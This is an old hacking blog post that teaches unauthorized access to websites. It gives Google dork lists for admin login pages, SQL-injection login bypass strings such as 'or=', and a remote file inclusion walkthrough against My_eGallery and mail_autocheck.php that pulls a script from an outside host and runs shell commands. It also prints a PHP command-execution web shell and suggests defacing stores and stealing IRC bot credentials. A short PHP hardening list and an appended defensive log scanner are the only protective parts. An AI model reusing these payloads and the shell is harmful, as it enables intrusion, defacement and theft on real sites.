
Google Hack Code: SQL Injection For Admin

This document contains information about hacking tools and techniques, including SQL injection exploits and instructions for hacking admin pages. It discusses bypassing Windows authenticity checks, downloading paid content for free, and exploiting vulnerabilities in specific scripts like My_eGallery to execute remote commands. The document provides example attack strings and URLs to test for vulnerabilities. It aims to help readers hack sites and access admin panels without authorization.

Uploaded by

Krishna Yedula
Copyright
© Attribution Non-Commercial (BY-NC)

Google Hack Code


SQL Injection for admin

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
root/login.asp
admin/index.asp

Login with:
Community ID: or=
Password: or=

Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin

1. Search in any search engine, e.g. --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site, like --> http://www.target.com/s-cart/index.phtml
3. Now go to the admin page by changing the URL to: http://www.target.com/s-cart/admin --> the browser automatically opens a login and password prompt!
   login : admin
   passwd : or=
4. If you are lucky, you can see the admin manager, show the Order table, or deface the s-cart page. OK, let's try :P~

Secure PHP

How to secure PHP:

1. Open php.ini (find out for yourself where it is located).
2. Find the safe_mode setting (the default value is off) and turn it on.
3. Turn off dangerous functions like passthru, system and exec by adding the function names to disable_functions=
4. The easy and more secure way --> use normal HTML, not PHP :)
5. Watch out for directory and file permissions.

Note: these functions are better turned off:

1. passthru, system, exec, myshellexec <-- PHP command shell
2. fopen <-- can execute a remote file
3. fwrite, fputs <-- to write files
4. phpinfo <-- data about PHP

Hacking concept:

http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id

You can find target websites with a search engine like Google. For example, we can use the keyword inurl or allinurl:

allinurl:/mail_autocheck.php?pm_path=*.*

A sample PHP injection script you can upload to your website.

------------------END HERE------------------

##############################################
My_eGallery security exploit
Author : scariot shall live for ever
##############################################

Bugs File may be : displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php

Note: for attacking you must use this script; save it and upload it to your website.
e.g. save with the file name: cmd.txt
e.g. from my site: http://www.geocities.com/seng_due/script/solohackerlink.txt

---------------- script from here ----------------
SCARIOT - WAS HERE !!! TEST YOUR SERVER !!!

# saleho PHP : # Released by : LALIEUR INC

// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?>

scariot shall live for ever

------------------ End of Script ------------------

###################################
Ok and now lets Search your Target
###################################

1. Search in any search engine, e.g. --> "allinurl:displayCategory.php" or "My_eGallery"
2. Get the target site, like --> http://www.target.com/modules/My_eGallery/public/displayCategory.php
3. Test the attack with the code: ?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
4. Display attacking : http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

5. Linux and Unix commands are used here :P~ e.g.: ls -al, uname -r, cat, echo, etc.

Steal password/user of eggdrop IRC bot

Click here for the Google search: http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user

Just inject using this, boss, hehehe:
User Name : "="
Password : "="

Strange that digishop still falls for it; SQL injection is probably old news by now.

Google Inject Again
Keyword: allinurl: uptime3?pin=

Dec  Hex  Code    Dec  Hex  Code    Dec  Hex  Code    Dec  Hex  Code
  0  00   NUL      32  20   space    64  40   @        96  60   `
  1  01   SOH      33  21   !        65  41   A        97  61   a
  2  02   STX      34  22   "        66  42   B        98  62   b
  3  03   ETX      35  23   #        67  43   C        99  63   c
  4  04   EOT      36  24   $        68  44   D       100  64   d
  5  05   ENQ      37  25   %        69  45   E       101  65   e
  6  06   ACK      38  26   &        70  46   F       102  66   f
  7  07   BEL      39  27   '        71  47   G       103  67   g
  8  08   BS       40  28   (        72  48   H       104  68   h
  9  09   HT       41  29   )        73  49   I       105  69   i
 10  0A   LF       42  2A   *        74  4A   J       106  6A   j
 11  0B   VT       43  2B   +        75  4B   K       107  6B   k
 12  0C   FF       44  2C   ,        76  4C   L       108  6C   l
 13  0D   CR       45  2D   -        77  4D   M       109  6D   m
 14  0E   SO       46  2E   .        78  4E   N       110  6E   n
 15  0F   SI       47  2F   /        79  4F   O       111  6F   o
 16  10   DLE      48  30   0        80  50   P       112  70   p
 17  11   DC1      49  31   1        81  51   Q       113  71   q
 18  12   DC2      50  32   2        82  52   R       114  72   r
 19  13   DC3      51  33   3        83  53   S       115  73   s
 20  14   DC4      52  34   4        84  54   T       116  74   t
 21  15   NAK      53  35   5        85  55   U       117  75   u
 22  16   SYN      54  36   6        86  56   V       118  76   v
 23  17   ETB      55  37   7        87  57   W       119  77   w
 24  18   CAN      56  38   8        88  58   X       120  78   x
 25  19   EM       57  39   9        89  59   Y       121  79   y
 26  1A   SUB      58  3A   :        90  5A   Z       122  7A   z
 27  1B   ESC      59  3B   ;        91  5B   [       123  7B   {
 28  1C   FS       60  3C   <        92  5C   \       124  7C   |
 29  1D   GS       61  3D   =        93  5D   ]       125  7D   }
 30  1E   RS       62  3E   >        94  5E   ^       126  7E   ~
 31  1F   US       63  3F   ?        95  5F   _       127  7F   DEL
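
A defender's view of the file-inclusion requests shown in this post, as an added example that is not part of the original post: a Python scan of web access logs for requests that pass a remote URL in a query parameter (as in pm_path= and basepath=), rated higher when the cmd or chdir parameter read by the quoted script is also present. The log lines, addresses, hostnames and the return_to allowlist entry are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format; the request line may contain raw spaces, so capture it whole.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3})')
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# Parameter names read by the command script quoted on this page.
CMD_PARAMS = {"cmd", "chdir"}
# Assumption: parameters that legitimately carry URLs on the monitored site.
URL_PARAM_ALLOWLIST = {"return_to"}


def inspect(line):
    """Return a finding for a request that passes a remote URL as a parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _method, _, rest = m["request"].partition(" ")
    target = re.sub(r'\s+HTTP/\d(?:\.\d)?$', '', rest)  # drop the protocol suffix
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    # parse_qsl decodes once; decode again to catch double-encoded probes.
    hits = [name for name, value in params
            if name not in URL_PARAM_ALLOWLIST and REMOTE_URL.match(unquote(value))]
    if not hits:
        return None
    has_cmd = any(name.lower() in CMD_PARAMS for name, _ in params)
    return {"ip": m["ip"], "path": parts.path, "params": hits,
            "status": int(m["status"]), "severity": "high" if has_cmd else "medium"}


def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [finding for finding in map(inspect, lines) if finding]


# Constructed sample log lines (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2008:01:12:44 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://files.example.test/cmd.txt?&cmd=uname -a HTTP/1.0" 200 512',
    '203.0.113.7 - - [12/Mar/2008:01:12:51 +0000] "GET /mail_autocheck.php?pm_path=http%3A%2F%2Ffiles.example.test%2Fx.txt%3F HTTP/1.1" 404 209',
    '198.51.100.20 - - [12/Mar/2008:01:13:02 +0000] "GET /login.php?return_to=https://www.example.test/account HTTP/1.1" 200 1043',
    '198.51.100.21 - - [12/Mar/2008:01:13:09 +0000] "GET /gallery.php?basepath=modules/My_eGallery HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests of this shape only succeed when PHP is willing to include a remote URL, so setting allow_url_include = Off in php.ini (and allow_url_fopen = Off where the application allows it) closes what these log lines are probing for.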

This entry was posted on 1:12 AM
